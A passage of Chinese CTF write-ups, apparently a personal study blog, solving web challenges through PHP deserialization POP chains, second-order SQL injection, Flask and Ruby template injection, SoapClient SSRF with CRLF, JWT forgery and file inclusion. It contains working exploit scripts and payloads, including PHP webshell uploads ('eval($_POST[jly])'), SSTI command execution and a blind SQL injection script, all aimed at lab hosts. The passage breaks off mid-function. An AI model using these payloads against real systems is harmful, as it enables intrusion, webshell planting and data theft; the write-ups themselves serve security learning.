根据代码逻辑。如果，调用这个函数，这个函数中，如果没有 !empty($_FILES) 不满足条件，且利用反序列化。我们可以控制对应的 filename_tmp filename。然后再让 ext 不为 0 这样我们可以调用下面的copy 从而实现修改文件名字。

思路

上传图片码。
想办法调用 Profile.php中的 upload_img() 函数修改文件名为 .php 文件，然后调用（测试发现利用 Js 标签的一句话不被解析。
想办法调用，首先我们可以利用 Profile.php 的类构造最后一步。

给 $filename_tmp $filename $except $ext 赋予对应的值。
Pop 链寻找

Profile.php 中这个类有如下属性通过上面的 upload_img 函数的分析，我们知道我们要控制的变量有 $filename_tmp $filename $except $ext
1
2
3
4
5
6
7
public $checker;
public $filename_tmp;
public $filename;
public $upload_menu;
public $ext;
public $img;
public $except;
且这个类中有两个可以利用的魔术方法
1
2
3
4
5
6
7
8
9
10
11
public function __get($name)
{
return $this->except[$name];
}

public function __call($name, $arguments)
{
if($this->{$name}){
$this->{$this->{$name}}($arguments);
}
}
读取不可访问属性的值时，__get() 会被调用；在对象中调用一个不可访问方法时，__call() 会被调用。

然后我们发现 Register.php 中有一个 __destruct() 魔术方法
1
2
3
4
5
6
public function __destruct()
{
if(!$this->registed){
$this->checker->index();
}
}
这里会调用 checker->index() 函数。

根据 Profile.php 中有个 __call 函数，且 Profile.php 中没有对应的 index() 函数，如果我们的 checker = Profile 类 当调用 Register.php 中的 __destruct() 魔术方法就会去调用到 Profile.php 中的链从而实现 pop 链。
构造路线
1. Register 类中的 checker 属性 = Profile 类
2. 当 Register 中的 __desctruct 魔术方法被调用时，因为 checker 为 Profile 类，因为Profile 类中没有对应的 index() 方法，这里会调用 Profile 类中的 __call() 魔术方。对应的 $registed 属性要为 0 才能执行 __desctruct 魔术方法
3. 然后我们构造 Profile 中的属性，$filename_tmp 我们要修改的文件名，$filename 修改为的文件名。因为要调用 upload_img() 函数，这里 __get() 和 __call() 相结合让 $except=array("index"=>"upload_img") 这样我们调用 Profile 的 Index() 方法的时候就会调用 upload_img() 函数，然后我们让 $ext = 1 这样能执行 copy 操作修改文件名。

exp

<?php
namespace app\web\controller;

class Register{
    public $checker;
    public $registed =0;//目的是过destruct里的if;
}
class Profile{
    public $checker =0 ;//目的是绕过index类的检查，防止退出程序
    public $filename_tmp="./upload/e2e7ec165ba05a5e1f3198caa7e22b54/00bf23e130fa1e525e332ff03dae345d.png";
    public $upload_menu;
    public $filename="./upload/e2e7ec165ba05a5e1f3198caa7e22b54/jly.php";
    public $ext=1;//目的是过if来调用复制webshell
    public $img;
    public $except=array("index"=>"upload_img");//目的是通过__get()魔术方法调用upload_Img函数
}

$a = new Register();
$a->checker = new Profile();//目的是调用POP链
$a->checker->checker=0;//调用pop链防止退出程序

echo base64_encode(serialize($a));

修改成了 jly.php

然后可以调用

拿到 flag

[b01lers2020]Welcome to Earth

2020.12.26

考点

查看源码emm

做题步骤

查看网页源码

自动跳转到 /die/

然后发现里面有个 /chase/

发现里面有个页面但是网页一下就跳转了。

抓包看看返回结果

会1秒后跳转，我们看看 leftt 目录

有句注释是 /shoot/

查看

有个 /door/

访问后是一个猜测选择

太多了emm 看到一个 /static/js/door.js

访问

有一个 open

fight

/static/js/fight.js

然后字符组合得到 flag

[网鼎杯2018]Unfinish

2020.12.26 - 27

考点

二次注入

做题步骤

打开只有一个登录页面，源代码也没什么提示。

根据 login.php 猜测有注册功能，测试 register.php

有页面可以注册

注册后可以登录

显示我们的用户名

用户名应该是我们注册时保存的，说明是有 sql 操作，可能有sql注入，这里的用户名可能可以二次注入

测试

用 hex 如果是结果有数字和字母，会只显示数字，如果用两个 hex 进行加密。这个时候我们的值就可以全是数字，但是hex加密的字符过长会被科学计数法显示，不能正确显示，只能利用每次取 3个字符依次组合到一起。

https://mayi077.gitee.io/2020/08/18/%E7%BD%91%E9%BC%8E%E6%9D%AF2018-Unfinish/

只能直接猜测用的是 flag 表明的表。

直接抄了一遍脚本

#!/usr/bin/env python2
# -*- coding:utf-8 -*-

import requests as req
import random
import sys
import time

URL = 'http://bdbf4426-87d9-420c-af99-fac22e78f03b.node3.buuoj.cn'

def login(email):
    data = {
        "email": email,
        "password": "123456"
    }
    res = req.post(URL + '/login.php', data)
    if res.status_code == 200 and '1          </span>' in res.content:
        return True
    return False


def reg(u, e):
    data = {
        "username": u,
        "email": e,
        "password": "123456"
    }
    res = req.post(URL + '/register.php', data, allow_redirects=False)
    if res.status_code == 302:
        return login(e)
    return False
table = 'qwertyuiopasdfghjklzxcvbnm'


def b(pl):
    email = ''.join(random.sample(table, 8)) + '@qq.com'
    return reg(pl, email)


def getLen(sql):
    print("[+] Starting getLen...")
    for i in range(1, 60):
        time.sleep(0.1)
        sys.stdout.write("[+] Len : -> %d <-\r" % i)
        sys.stdout.flush()
        if b("1'and((select length((%s)))=%d)and'1" % (sql, i)):
            print("[+] Len : -> %d <-" % i)
            return i
    return 0


def getData(sql="version()"):
    _len = getLen(sql)
    if not _len:
        print("[-] getLen 'Error'")
        return False
    print("[+] Starting getData...")
    table = '}{1234567890.-@_qwertyuiopasdfghjklzxcvbnm'
    res = ''
    for pos in range(1, _len + 1):
        for ch in table:
            time.sleep(0.1)
            sys.stdout.write("[+] Result : -> %s%c <-\r" % (res, ch))
            sys.stdout.flush()
            pl = "1'and((select substr((%s)from(%d)for(1))='%s'))and'1" % (
                sql, pos, ch)
            if b(pl):
                res += ch
                break
    print("[+] Result : -> %s <- " % res.lower())
    return res

if __name__ == '__main__':
    pl = 'version()'
    pl = 'select t.c from (select (select 1)c union select * from flag)t limit 1 offset 1'
    getData(pl)

2020.12.27

考点

cookie修改

做题步骤

猜测和 cookie 有关。

session 可以base64 解密得到数据

购买一个东西后

session 修改了

解密得到对应数据。我们尝试修改内容base64 加密替换

替换后刷新我们钱变多了

然后可以购买 flag

[CISCN2019 华东南赛区]Double Secret

2020.12.27

考点

ssti

做题步骤

打开没什么东西扫下目录

robots.txt

secret

然后我们传入我们的 secret 会发现有页面返回值。

乱输入值后，发现有报错。

这个时候我们看到的关键代码。

if(secret==None)
    return 'Tell me your secret.I will encrypt it so others can\'t see'
rc=rc4_Modified.RC4("HereIsTreasure")   #解密
deS=rc.do_crypt(secret)
 
a=render_template_string(safe(deS))
 
if 'ciscn' in a.lower():
    return 'flag detected!'
return a

里面有一个 RC4 的解密

网上找一个对通用 ssit 进行加密试试

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('ls /').read()")}}{% endif %}{% endfor %}

rc4 加密

https://www.jianshu.com/p/d9ad5fc524ec

import base64
from urllib.parse import quote
def rc4_main(key = "init_key", message = "init_message"):
    # print("RC4加密主函数")
    s_box = rc4_init_sbox(key)
    crypt = str(rc4_excrypt(message, s_box))
    return  crypt
def rc4_init_sbox(key):
    s_box = list(range(256))
    # print("原来的 s 盒：%s" % s_box)
    j = 0
    for i in range(256):
        j = (j + s_box[i] + ord(key[i % len(key)])) % 256
        s_box[i], s_box[j] = s_box[j], s_box[i]
    # print("混乱后的 s 盒：%s"% s_box)
    return s_box
def rc4_excrypt(plain, box):
    # print("调用加密程序成功。")
    res = []
    i = j = 0
    for s in plain:
        i = (i + 1) % 256
        j = (j + box[i]) % 256
        box[i], box[j] = box[j], box[i]
        t = (box[i] + box[j]) % 256
        k = box[t]
        res.append(chr(ord(s) ^ k))
    cipher = "".join(res)
    print("加密后的字符串是：%s" %quote(cipher))
    return (str(base64.b64encode(cipher.encode('utf-8')), 'utf-8'))

payload = "{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval(\"__import__('os').popen('ls /').read()\")}}{% endif %}{% endfor %}"
rc4_main("HereIsTreasure",payload)

加密后不可显示

利用 url 加密

.J%19S%C2%A5%15Km%2B%C2%94%C3%96S%C2%85%C2%8F%C2%B8%C2%97%0B%C2%90X5%C2%A4A%C3%9FMD%C2%AE%07%C2%8BS%C3%9F7%C3%98%12%C3%85r%C3%A9%1B%C3%A4%2A%C3%A7w%C3%9B%C2%9E%C3%B1h%1D%C2%82%25%C3%AD%C3%B4%06%29%7F%C3%B0o%2C%C2%9E9%08%C3%87%C3%B7u.%C3%BB%C2%95%14%C2%BFv%05%19j%C2%AEL%C3%9A-%C3%A3t%C2%AC%7FX%2C8L%C2%81%C3%91H%C3%BF%C3%B6%C3%A3%C3%9A%C3%B5%C2%9A%C2%A6%23%06%C2%A7%C2%B8%C2%BB%C2%B9%C3%A6ny%C3%98%C3%8Aj%C2%BB%25X%15%C3%97%C2%84F%24%1As%5E%C2%9B%C3%97%C2%A4%20j%C2%A5/%17%1C%C3%9Fs%C2%AF6%C3%85%C2%A5%C2%B1.%C3%A8%C2%A2Y%21%C2%A8%C3%A0%10%C2%8Aa%5D%5C%2B%C3%8E%C2%B0%C2%99%C3%A0%C2%BE%C2%87-%10x%20%5D%C3%9A%0B%C2%882P%C3%A3%C3%9C%1A%3A%3F%C3%A6%C2%B2%20%C2%A2%C3%82%C2%B9%0F%0B%C3%95G%23-%C3%A9%C2%A2%19%C3%85%C2%B2%C2%8F%22%C3%AE%C2%A3%C2%93l%C3%8A%7B%03%C3%B9%C2%B6%C2%92%C3%97%11%20%C3%9C%C3%AE%C3%AA%02

然后查看 flag

pyload = "{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval(\"__import__('os').popen('cat /flag.txt').read()\")}}{% endif %}{% endfor %}"

bestphp’s revenge

2020.12.27

考点

session 反序列化

call_user_func 利用

session反序列化->soap(ssrf+crlf)->call_user_func激活soap类

https://blog.spoock.com/2016/10/16/php-serialize-problem/

https://www.smi1e.top/lctf2018-bestphps-revenge-%E8%AF%A6%E7%BB%86%E9%A2%98%E8%A7%A3/

http://www.const27.com/2020/06/18/bestphps-revenge/

做题步骤

访问页面

<?php
highlight_file(__FILE__);
$b = 'implode';
call_user_func($_GET['f'], $_POST);
session_start();
if (isset($_GET['name'])) {
    $_SESSION['name'] = $_GET['name'];
}
var_dump($_SESSION);
$a = array(reset($_SESSION), 'welcome_to_the_lctf2018');
call_user_func($b, $a);
?> array(0) { }

里面有函数 call_user_func

call_user_func ( callable $callback [, mixed $parameter [, mixed $... ]] ) : mixed
1
callback
将被调用的回调函数（callable）。
1
parameter
0个或以上的参数，被传入回调函数。

call_user_func 函数不止可以调用自定义函数、类，也可以调用php内置函数、内置类如extract

Extract 可以加伪协议读源码

函数调用

<?php
function barber($type)
{
    echo "You wanted a $type haircut, no problem\n";
}
call_user_func('barber', "mushroom");
call_user_func('barber', "shave");
?>

**用*call_user_func()*来调用一个类里面的方法

<?php

class myclass {
    static function say_hello()
    {
        echo "Hello!\n";
    }
}

$classname = "myclass";

call_user_func(array($classname, 'say_hello'));
call_user_func($classname .'::say_hello'); // As of 5.2.3

$myobject = new myclass();

call_user_func(array($myobject, 'say_hello'));

?>

题目中的源码，我们只能调用已经存在的函数

发现有一个 flag.php文件

有session 验证，且要得到 session 我们的访问应该为 127.0.0.1。所以这个题目，我们还需要利用 ssrf 来得到对应的 flag.php 的文件的内容

我们需要访问 127.0.0.1/flag

看到会吧 flag 的值保存到 session 里面。

猜测会用到 session 反序列化

为什么 session 能够反序列化

session.serialize_handler存在以下几种

1
2
3

php_binary 键名的长度对应的ascii字符+键名+经过serialize()函数序列化后的值
php 键名+竖线（|）+经过serialize()函数处理过的值
php_searialize 经过serialize()函数处理过的值，会将键名和值当作一个数组序列化

php_binary引擎格式

Php 引擎格式

php_searialize 引擎格式

漏洞利用，不同 session 引擎的解析规范来进行利用

我们知道了 session 的保存

有反序列化点，但是没有 pop链，这个时候我们要利用 php 内置类进行反序列。

https://www.cnblogs.com/iamstudy/articles/unserialize_in_php_inner_class.html#_label1_0

SoapClient是php内置的类，当__call方法被触发后（调用不存在方法），它可以发送HTTP和HTTPS请求。该类的构造函数如下：

1	public SoapClient :: SoapClient （mixed $wsdl [，array $options ]）

第一个参数是用来指明是否是wsdl模式。

第二个参数为一个数组，如果在wsdl模式下，此参数可选；如果在非wsdl模式下，则必须设置location和uri选项，其中location是要将请求发送到的SOAP服务器的URL，而uri 是SOAP服务的目标命名空间。

第一步。构造 soapcilent 来实现 http 请求 127.0.0.1/flag.php

利用 call_user_func($_GET['f'], $_POST); 调用 session_start 修改 session保存形式 serialize_handler 为 php_serialize_handler

还利用了 CRLF https://www.jianshu.com/p/d4c304dbd0af

<?php
$target='http://127.0.0.1/flag.php';
$b = new SoapClient(null,array('location' => $target,
                               'user_agent' => "AAA:BBB\r\n" .
                                             "Cookie:PHPSESSID=dde63k4h9t7c9dfl79np27e912",
                               'uri' => "http://127.0.0.1/"));

$se = serialize($b); 
echo urlencode($se);
# O%3A10%3A%22SoapClient%22%3A5%3A%7Bs%3A3%3A%22uri%22%3Bs%3A17%3A%22http%3A%2F%2F127.0.0.1%2F%22%3Bs%3A8%3A%22location%22%3Bs%3A25%3A%22http%3A%2F%2F127.0.0.1%2Fflag.php%22%3Bs%3A15%3A%22_stream_context%22%3Bi%3A0%3Bs%3A11%3A%22_user_agent%22%3Bs%3A52%3A%22AAA%3ABBB%0D%0ACookie%3APHPSESSID%3Ddde63k4h9t7c9dfl79np27e912%22%3Bs%3A13%3A%22_soap_version%22%3Bi%3A1%3B%7D

然后上传。

现在我们的能容已经保存在 session 文件中。我们利用 extract 覆盖变量b，利用call_user_func调用SoapClient类中的不存在方法，触发__call方法，执行ssrf。并获得访问flag.php的PHPSESSID
处发后直接访问网页会显示 session 保存的值，就保存了 flag.php 里面的 flag 文件

得到flag

[SCTF2019]Flag Shop

2020.12.28 - 31

考点

ruby ssti。

jwt 伪造

做题步骤

可以查看源码


<h1 style="text-align: center">Flag Shop</h1>

Your uid is <b id="uid"></b>
<br />
Your JinKela is <b id="jkl"></b>
<br />
Flag Price: <b>1000000000000000000000000000</b>
<hr />

<button onclick="buyFlag()" style="text-align: left">buy flag</button>
<button onclick="reset()" style="text-align: center">reset</button>
<button onclick="work()" style="text-align: right">work</button>

<script>
    function buyFlag() {
        fetch("/shop", {
            method: 'POST', // or 'PUT'
            headers: new Headers({
                'Content-Type': 'application/x-www-form-urlencoded'
            })
        })
            .then(res => res.text())

            .then(function (response) {
                    alert(response)
                })

            .catch(error =>alert(error))
    }
    function reset() {
        if(confirm("This will reset all Jinkelas , Are U Sure?")){
            fetch("/api/auth");
            setTimeout(()=>window.location.reload(),500);
        }
    }
    function work() {
        fetch("/work?name=bot&do=bot is working")
            .then(()=>window.location.reload());
    }

    fetch("/api/info",{
            redirect: 'manual'
        })
        .then(function (res) {

          if(res.ok){
              return res.json()
          }
          else{
              fetch("/api/auth")
              reject;
          }
        })
        .then(res=>{
            var info = res;
            console.log(info);
            document.getElementById("uid").innerText = info.uid;
            document.getElementById("jkl").innerText = info.jkl;
        })
        .catch(error => setTimeout(()=>window.location.reload(),500))




</script>

没发现有什么东西，扫目录

有个 robots.txt 访问目录看看

访问得到 flag

源码 ruby 编写的。

require 'sinatra'
require 'sinatra/cookies'
require 'sinatra/json'
require 'jwt'
require 'securerandom'
require 'erb'

set :public_folder, File.dirname(__FILE__) + '/static'

FLAGPRICE = 1000000000000000000000000000
ENV["SECRET"] = SecureRandom.hex(64)

configure do
  enable :logging
  file = File.new(File.dirname(__FILE__) + '/../log/http.log',"a+")
  file.sync = true
  use Rack::CommonLogger, file
end

get "/" do
  redirect '/shop', 302
end

get "/filebak" do
  content_type :text
  erb IO.binread __FILE__
end

get "/api/auth" do
  payload = { uid: SecureRandom.uuid , jkl: 20}
  auth = JWT.encode payload,ENV["SECRET"] , 'HS256'
  cookies[:auth] = auth
end

get "/api/info" do
  islogin
  auth = JWT.decode cookies[:auth],ENV["SECRET"] , true, { algorithm: 'HS256' }
  json({uid: auth[0]["uid"],jkl: auth[0]["jkl"]})
end

get "/shop" do
  erb :shop
end

get "/work" do
  islogin
  auth = JWT.decode cookies[:auth],ENV["SECRET"] , true, { algorithm: 'HS256' }
  auth = auth[0]
  unless params[:SECRET].nil?
    if ENV["SECRET"].match("#{params[:SECRET].match(/[0-9a-z]+/)}")
      puts ENV["FLAG"]
    end
  end

  if params[:do] == "#{params[:name][0,7]} is working" then

    auth["jkl"] = auth["jkl"].to_i + SecureRandom.random_number(10)
    auth = JWT.encode auth,ENV["SECRET"] , 'HS256'
    cookies[:auth] = auth
    ERB::new("<script>alert('#{params[:name][0,7]} working successfully!')</script>").result

  end
end

post "/shop" do
  islogin
  auth = JWT.decode cookies[:auth],ENV["SECRET"] , true, { algorithm: 'HS256' }

  if auth[0]["jkl"] < FLAGPRICE then

    json({title: "error",message: "no enough jkl"})
  else

    auth << {flag: ENV["FLAG"]}
    auth = JWT.encode auth,ENV["SECRET"] , 'HS256'
    cookies[:auth] = auth
    json({title: "success",message: "jkl is good thing"})
  end
end


def islogin
  if cookies[:auth].nil? then
    redirect to('/shop')
  end
end

需要我们的chookies 中 jwt auth 的 jkl >= 1000000000000000000000000000 这个时候才会把我们的 FLAG写到 auth 然后用jwt 加密。

点击work 我们的 jkl 会在 0-9 中随机增加。

思路是修改 cookie 来门的 jwt 中的 jkl 达到要求。

这样我们就必须要得到我们对应的 jwt 秘钥

这个秘钥是保存在全局中的 ENV["SECRET"]

源码中有个可控点

if params[:do] == "#{params[:name][0,7]} is working" then

  auth["jkl"] = auth["jkl"].to_i + SecureRandom.random_number(10)
  auth = JWT.encode auth,ENV["SECRET"] , 'HS256'
  cookies[:auth] = auth
  ERB::new("<script>alert('#{params[:name][0,7]} working successfully!')</script>").result

end

其中 name 和 do 都是我们可控的。

且我们能让他们两个的值相等。

后面才知道这是一个 ruby的模板注入。

https://blog.csdn.net/zdq0394123/article/details/8443694

需要利用 ruby 模板的预定义变量来泄露 ENV 中的 SECRET 从而实现我们能伪造 jwt

根据 work 路由里面的内容

因为在work 中先匹配了一次 ENV["SECRET"] 所以这时我们可以利用

unless params[:SECRET].nil?
  if ENV["SECRET"].match("#{params[:SECRET].match(/[0-9a-z]+/)}")
    puts ENV["FLAG"]
  end
end

来进行泄露 SECRET 的值 (所以我们调用/work 的时候要传入 SECRET)

do 后面加 is working是让if 等式成立。

payload

1	/work?do=<%=$'%> is working&name=<%=$'%>&SECRET=

这样我们就能泄露预定义里面的值也就刚好是 ENV["SECRET"] 的值从而实现泄露 jwt 的key

利用展现加密网站

将泄露的值填入，让修改 jkl 为大于我们需要的值。

然后在 shop 路由修改 cookie

成功修改

从而直接能够购买

源码中

if auth[0]["jkl"] < FLAGPRICE then

  json({title: "error",message: "no enough jkl"})
else

  auth << {flag: ENV["FLAG"]}
  auth = JWT.encode auth,ENV["SECRET"] , 'HS256'
  cookies[:auth] = auth
  json({title: "success",message: "jkl is good thing"})
end

购买成功 flag 会被保存在我们的 jwt 中，我们直接利用 cookie 解密得到 flag

[RootersCTF2019]I_<3_Flask

2020.12.31

考点

ssti

做题步骤

根据题目猜测是 flask 的模板注入

但是不知道注入用到的是哪个参数。

利用 https://github.com/s0md3v/Arjun.git

来测试得到name 参数

然后利用普通的 ssti 注入

/?name={{[][%27__class__%27][%27__bases__%27][0][%27__subclasses__%27]()[182][%27__init__%27][%27__globals__%27][%27__builtins__%27][%27eval%27]("__import__(%27os%27).popen(%27cat%20flag.txt%27).read()")}}

或者用 tplmap.py (python2)

sudo git clone https://github.com/epinna/tplmap.git

sudo pip install -r requirements.txt

然后利用

python tplmap.py -u xxx?name=1 --os-shell

直接拿shell

[GYCTF2020]Easyphp

2020.1.1

考点

源码泄露

反序列

做题步骤

打开网页

猜测可能存在后门，目录扫描。

发现有一个 www.zip

下载审计源码

发现没有 sql 注入

if(isset($_POST['username'])){
	if(preg_match("/union|select|drop|delete|insert|\#|\%|\`|\@|\\\\/i", $_POST['username'])){
		die("<br>Damn you, hacker!");
	}
	if(preg_match("/union|select|drop|delete|insert|\#|\%|\`|\@|\\\\/i", $_POST['password'])){
		die("Damn you, hacker!");
	}
	$user->login();
}

基本都过滤光了

但是什么 new 了一个 user 类

有个 update.php 实现可以直接查看 flag 且调用了 user 类的 update 方法。

<?php
require_once('lib.php');
echo '<html>
<meta charset="utf-8">
<title>update</title>
<h2>这是一个未完成的页面，上线时建议删除本页面</h2>
</html>';
if ($_SESSION['login']!=1){
	echo "你还没有登陆呢！";
}
$users=new User();
$users->update();
if($_SESSION['login']===1){
	require_once("flag.php");
	echo $flag;
}
?>

然后查看关键的 lib.php

从 User 类的 uodate 方法开始入手

public function update(){
    $Info=unserialize($this->getNewinfo());
    $age=$Info->age;
    $nickname=$Info->nickname;
    $updateAction=new UpdateHelper($_SESSION['id'],$Info,"update user SET age=$age,nickname=$nickname where id=".$_SESSION['id']);
    //这个功能还没有写完 先占坑
}

这个方法调用了一个反序列化

代码跟进 getNewinfo()

public function getNewInfo(){
    $age=$_POST['age'];
    $nickname=$_POST['nickname'];
    return safe(serialize(new Info($age,$nickname)));
}

继续跟到 Info 类

class Info{
    public $age;
    public $nickname;
    public $CtrlCase;
    public function __construct($age,$nickname){
        $this->age=$age;
        $this->nickname=$nickname;
    }
    public function __call($name,$argument){
        echo $this->CtrlCase->login($argument[0]);
    }
}

里面有一个 __call 方法可能可以调用

然后 User 类中

还new 了一个 UpdateHelper 方法

Class UpdateHelper{
    public $id;
    public $newinfo;
    public $sql;
    public function __construct($newInfo,$sql){
        $newInfo=unserialize($newInfo);
        $upDate=new dbCtrl();
    }
    public function __destruct()
    {
        echo $this->sql;
    }
}

里面有一个 __destruct 方法可以调用。

这里可以作为且 __destruct() 方法里面是调用的 echo（可以和 __string() 函数组合使用

且发现在 User 类中是有这样一个方法的。

public function __toString()
{
    $this->nickname->update($this->age);
    return "0-0";
}

且 Info 类里面 __call 猜测可能在这里布置

从而够着pop链

UpdateHelper 的 __destruct() 方法
User 的 __toString() 方法
Info 的 __calll() 方法
dbCtrl 的 login() 方法

然后根据 Info 的 __call() 传入的参数是 $age

所以我们将 sql 语句布置在 $age 之后就能被调用了。

在 dbCtrl 的 login() 函数中

利用 $result->bind_result($idResult, $passwordResult); 且在调用后会返回 $idResult 的值

如果 $this->token=='admin' 会返回我们的 $idResult 。

染回到 Info 的 __call() 函数中的 echo 讲查询结果打印出来。

$result=$this->mysqli->prepare($sql);
$result->bind_param('s', $this->name);
$result->execute();
$result->bind_result($idResult, $passwordResult);
$result->fetch();
$result->close();
if ($this->token=='admin') {
  return $idResult;
}

为了得到登录的密码，因为知道会显示 $idResult ，所以我们的把 password 放在第一位

"select password,id from user where username=?"

因为 dbCtrl::login($sql) 这个 $sql 赋值给 User 的 $age

payload

<?php
 
class dbCtrl{
    public $hostname="127.0.0.1";
    public $dbuser="root";
    public $dbpass="root";
    public $database="test";
    public $name="admin";
    public $password;
    public $mysqli;
    public $token="admin";
}
 
class User{
    public $id;
    public $age="select password,id from user where username=?";
    public $nickname;
}
 
class UpdateHelper{
    public $id;
    public $newinfo;
    public $sql;
}
 
class Info{
    public $age;
    public $nickname;
    public $CtrlCase;
}


$dbctrl = new dbCtrl();
$user = new User();
$updatehelper = new UpdateHelper();
$info = new Info();
$info->$CtrlCase = $dbctrl;
$user->$nickname = $info;
$UpdateHelper->$sql = $user;

我们的 pop 链已经构造好了

但是我们的入口函数是 $Info=unserialize($this->getNewinfo());

我们需要让 Inof 的参数有一个布置为我们够着的 UpdateHelper 类的 pop 链

因为对应的方法为序列化后有一个 safe 函数。

是直接的替换。我们可以利用这个函数进行字符替换，从而逃逸 pop 链。让我们布置的 pop 链的类成为 Info 的入口

public function getNewInfo(){
  $age=$_POST['age'];
  $nickname=$_POST['nickname'];
  return safe(serialize(new Info($age,$nickname)));
}

Info 类
class Info{
  public $age;
  public $nickname;
  public $CtrlCase;
  public function __construct($age,$nickname){
    $this->age=$age;
    $this->nickname=$nickname;
  }
  public function __call($name,$argument){
    echo $this->CtrlCase->login($argument[0]);
  }
}

safe 函数
function safe($parm){
    $array= array('union','regexp','load','into','flag','file','insert',"'",'\\',"*","alter");
    return str_replace($array,'hacker',$parm);
}

我们上面生成的序列化的前面要加上。";s:8:"CtrlCase";" 后面加上 }

echo '";s:8:"CtrlCase";'.serialize($updatehelper)."}";

因为序列化后会进行 safe 函数，

会讲里面的黑名单替换为 hacker 6的字符的字符串。

让我们计算一下我们这个 pop链的长度，实现替换后，让我们的 pop链逃逸为我们的 Info 类里面的序列化的另一个参数。

得到的序列化为

";s:8:"CtrlCase";O:12:"UpdateHelper":3:{s:2:"id";N;s:7:"newinfo";N;s:3:"sql";O:4:"User":3:{s:2:"id";N;s:3:"age";s:45:"select password,id from user where username=?";s:8:"nickname";O:4:"Info":3:{s:3:"age";N;s:8:"nickname";N;s:8:"CtrlCase";O:6:"dbCtrl":8:{s:8:"hostname";s:9:"127.0.0.1";s:6:"dbuser";s:4:"root";s:6:"dbpass";s:4:"root";s:8:"database";s:4:"test";s:4:"name";s:5:"admin";s:8:"password";N;s:6:"mysqli";N;s:5:"token";s:5:"admin";}}}}}

长度为 443

所以我们要逃逸这么多字。

可以利用 safe 里面的 ' 一次能逃逸 5个字符 union 可以逃逸 1个字符

443 个字符串需要。

88个 ' 3个union

最后的 payload

''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''unionunionunion";s:8:"CtrlCase";O:12:"UpdateHelper":3:{s:2:"id";N;s:7:"newinfo";N;s:3:"sql";O:4:"User":3:{s:2:"id";N;s:3:"age";s:45:"select password,id from user where username=?";s:8:"nickname";O:4:"Info":3:{s:3:"age";N;s:8:"nickname";N;s:8:"CtrlCase";O:6:"dbCtrl":8:{s:8:"hostname";s:9:"127.0.0.1";s:6:"dbuser";s:4:"root";s:6:"dbpass";s:4:"root";s:8:"database";s:4:"test";s:4:"name";s:5:"admin";s:8:"password";N;s:6:"mysqli";N;s:5:"token";s:5:"admin";}}}}}

从而得到 md5 的密码。

glzjin

登录得到 flag

账号 admin

[NPUCTF2020]ezinclude

2021.1。2

考点

做题步骤

打开网站

源码看到注释

直接抓包传入 /?pass=HASH

然后发现有个重定位

访问网站发现有个文件包含漏洞，可以利用这个漏洞去读源码。

利用 filter

/flflflflag.php?file=php://filter/convert.base64-encode/resource=flflflflag.php

<html>
<head>
<script language="javascript" type="text/javascript">
           window.location.href="404.html";
</script>
<title>this_is_not_fl4g_and_出题人_wants_girlfriend</title>
</head>
<>
<body>
<?php
$file=$_GET['file'];
if(preg_match('/data|input|zip/is',$file)){
	die('nonono');
}
@include($file);
echo 'include($_GET["file"])';
?>
</body>
</html>

/flflflflag.php?file=php://filter/convert.base64-encode/resource=index.php

<?php
include 'config.php';
@$name=$_GET['name'];
@$pass=$_GET['pass'];
if(md5($secret.$name)===$pass){
	echo '<script language="javascript" type="text/javascript">
           window.location.href="flflflflag.php";
	</script>
';
}else{
	setcookie("Hash",md5($secret.$name),time()+3600000);
	echo "username/password error";
}
?>
<html>
<!--md5($secret.$name)===$pass -->
</html>

发现里面禁用了 /data|input|zip 不能写一句话了

文件扫描发现有个 dir.php 是显示 /tmp 文件夹下的文件内容

1
2
3

<?php
var_dump(scandir('/tmp'));
?>

猜测可能和 tmp 目录有关。搜索 文件包含 /tmp目录

找到对应文章

https://coomrade.github.io/2018/10/26/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E7%9A%84%E4%B8%80%E4%BA%9Bgetshell%E5%A7%BF%E5%8A%BF/

找到一个 Payload

import requests
import re
file_data={
	'file': "<?php eval($_POST[jly]);"
}
url="http://02965d1a-b3d2-4ba9-896c-6284d1589c92.node3.buuoj.cn/flflflflag.php?file=php://filter/string.strip_tags/resource=/etc/passwd"
r=requests.post(url=url,files=file_data,allow_redirects=False)

然后访问 /tmp 目录下的的一句话文件。

然后传入传输 jly=phpinfo();

我的 bp 会出现重定向，只能使用 curl

然后在返回内容里面找到 flag

[安洵杯 2019]不是文件上传

2021.1.2

考点

反序列化

sql 注入

做题步骤

看到一个提示 powered by wowouploadimage

猜测应该是有对应的文件的

找到看到是出题人的

https://github.com/Threezh1/wowouploadimage.git

下载

查看 upload 地方的代码。

check 是白名单

刚开始以为可以利用 phar 来让过，但是没有文件包含的点。所以上传一句话应该是不能的。

public function check($info)
{
  $basename = substr(md5(time().uniqid()),9,16);
  $filename = $info["name"];
  $ext = substr(strrchr($filename, '.'), 1);
  $cate_exts = array("jpg","gif","png","jpeg");
  if(!in_array($ext,$cate_exts)){
    die("<p>Please upload the correct image file!!!</p>");
  }
  $title = str_replace(".".$ext,'',$filename);
  return array('title'=>$title,'filename'=>$basename.".".$ext,'ext'=>$ext,'path'=>$this->folder.$basename.".".$ext);
}

继续看代码。

发现在 helper 类里面，有一个 __destruct 函数。且这个函数会调用 view_files 方法。

从而显示 $path 里面的内容

public function view_files($path){
  if ($this->ifview == False){
    return False;
    //The function is not yet perfect, it is not open yet.
  }
  $content = file_get_contents($path);
  echo $content;
}

function __destruct(){
  # Read some config html
  $this->view_files($this->config);
}

然后在 show.php 中，外面发现。里面有一个 unserialize() 参数是直接数据库取出来的。

public function Get_All_Images(){
  $sql = "SELECT * FROM images";
  $result = mysqli_query($this->con, $sql);
  if ($result->num_rows > 0){
    while($row = $result->fetch_assoc()){
      if($row["attr"]){
        $attr_temp = str_replace('\0\0\0', chr(0).'*'.chr(0), $row["attr"]);
        $attr = unserialize($attr_temp);
      }
      echo "<p>id=".$row["id"]." filename=".$row["filename"]." path=".$row["path"]."</p>";
    }
  }else{
    echo "<p>You have not uploaded an image yet.</p>";
  }
  mysqli_close($this->con);
}

猜测如果这个反序列化内容就是我们

helper 类这样我们可以调用到 __destruct 方法。从而打印内容。

然后看看哪儿插入的数据

在 helper 类中 insert_array() 函数

public function insert_array($data)
{	
